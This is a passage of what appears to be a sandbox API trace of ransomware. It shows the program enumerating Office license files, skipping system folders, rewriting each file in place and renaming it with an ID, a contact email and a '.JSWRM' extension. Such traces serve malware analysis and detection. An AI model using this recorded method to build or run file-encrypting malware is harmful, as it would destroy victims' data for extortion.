hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0110.130] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0110.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0110.131] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb30ca82, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb30ca82, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb4d66b5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d90, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SkypeforBusinessVL_KMS_Client-ul-oob.xrm-ms", cAlternateFileName="SK7437~1.XRM")) returned 1 [0110.131] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ul-oob.xrm-ms", lpString2=".") returned 1 [0110.131] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ul-oob.xrm-ms", lpString2="..") returned 1 [0110.131] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ul-oob.xrm-ms", lpString2="...") returned 1 [0110.131] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ul-oob.xrm-ms", lpString2="windows") returned -1 [0110.131] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0110.131] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0110.131] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0110.131] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.131] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0110.131] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0110.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0110.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0110.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 43 [0110.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0110.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0110.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0110.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0110.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 43 [0110.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0110.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0110.131] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0110.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.131] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0110.131] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_kms_client-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.132] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11664) returned 1 [0110.132] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.132] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d90) returned 0x24c1d0 [0110.132] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d90, lpOverlapped=0x0) returned 1 [0110.134] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.134] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d90, lpOverlapped=0x0) returned 1 [0110.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.134] CloseHandle (hObject=0x45c) returned 1 [0110.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0110.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0110.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0110.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0110.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0110.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0110.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0110.135] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0110.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0110.135] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0110.135] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_kms_client-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_KMS_Client-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_kms_client-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0110.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0110.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0110.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0110.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.136] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb29a366, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb29a366, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb37f192, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x25b8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SkypeforBusinessVL_KMS_Client-ul.xrm-ms", cAlternateFileName="SK4D34~1.XRM")) returned 1 [0110.136] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ul.xrm-ms", lpString2=".") returned 1 [0110.136] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ul.xrm-ms", lpString2="..") returned 1 [0110.136] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ul.xrm-ms", lpString2="...") returned 1 [0110.136] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ul.xrm-ms", lpString2="windows") returned -1 [0110.136] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ul.xrm-ms", lpString2="recovery") returned 1 [0110.136] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ul.xrm-ms", lpString2="perflogs") returned 1 [0110.136] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ul.xrm-ms", lpString2="documents and settings") returned 1 [0110.136] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ul.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.136] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ul.xrm-ms", lpString2="system volume information") returned -1 [0110.136] lstrcmpiW (lpString1="SkypeforBusinessVL_KMS_Client-ul.xrm-ms", lpString2="msocache") returned 1 [0110.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0110.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_KMS_Client-ul.xrm-ms", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0110.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0110.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_KMS_Client-ul.xrm-ms", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 39 [0110.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0110.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0110.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_KMS_Client-ul.xrm-ms", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0110.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_KMS_Client-ul.xrm-ms", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 39 [0110.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0110.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0110.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0110.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.137] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0110.137] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_kms_client-ul.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.137] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9656) returned 1 [0110.137] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x25b0) returned 0x24c1d0 [0110.137] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x25b0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x25b0, lpOverlapped=0x0) returned 1 [0110.174] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.174] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x25b0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x25b0, lpOverlapped=0x0) returned 1 [0110.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.175] CloseHandle (hObject=0x45c) returned 1 [0110.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0110.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0110.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0110.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0110.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0110.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0110.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0110.175] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0110.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0110.175] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0110.175] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_kms_client-ul.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_KMS_Client-ul.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_kms_client-ul.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.176] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0110.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0110.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0110.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0110.177] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb27410b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb27410b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb332ce4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x29a7, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="SkypeforBusinessVL_MAK-pl.xrm-ms", cAlternateFileName="SK16D7~1.XRM")) returned 1 [0110.177] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-pl.xrm-ms", lpString2=".") returned 1 [0110.177] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-pl.xrm-ms", lpString2="..") returned 1 [0110.177] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-pl.xrm-ms", lpString2="...") returned 1 [0110.177] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-pl.xrm-ms", lpString2="windows") returned -1 [0110.177] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-pl.xrm-ms", lpString2="recovery") returned 1 [0110.177] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-pl.xrm-ms", lpString2="perflogs") returned 1 [0110.177] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-pl.xrm-ms", lpString2="documents and settings") returned 1 [0110.177] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.177] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-pl.xrm-ms", lpString2="system volume information") returned -1 [0110.177] lstrcmpiW (lpString1="SkypeforBusinessVL_MAK-pl.xrm-ms", lpString2="msocache") returned 1 [0110.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0110.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_MAK-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0110.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0110.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_MAK-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0110.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0110.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0110.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_MAK-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0110.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0110.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SkypeforBusinessVL_MAK-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d298, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeforBusinessVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0110.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0110.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0110.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0110.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0110.177] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\SkypeforBusinessVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\skypeforbusinessvl_mak-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.178] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10663) returned 1 [0110.178] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x29a0) returned 0x24c1d0 [0110.178] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x29a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x29a0, lpOverlapped=0x0) returned 1 [0110.180] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.180] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x29a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x29a0, lpOverlapped=0x0) returned 1 [0110.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.180] CloseHandle (hObject=0x45c) returned 1 [0110.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0110.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0110.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0110.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0110.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0110.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 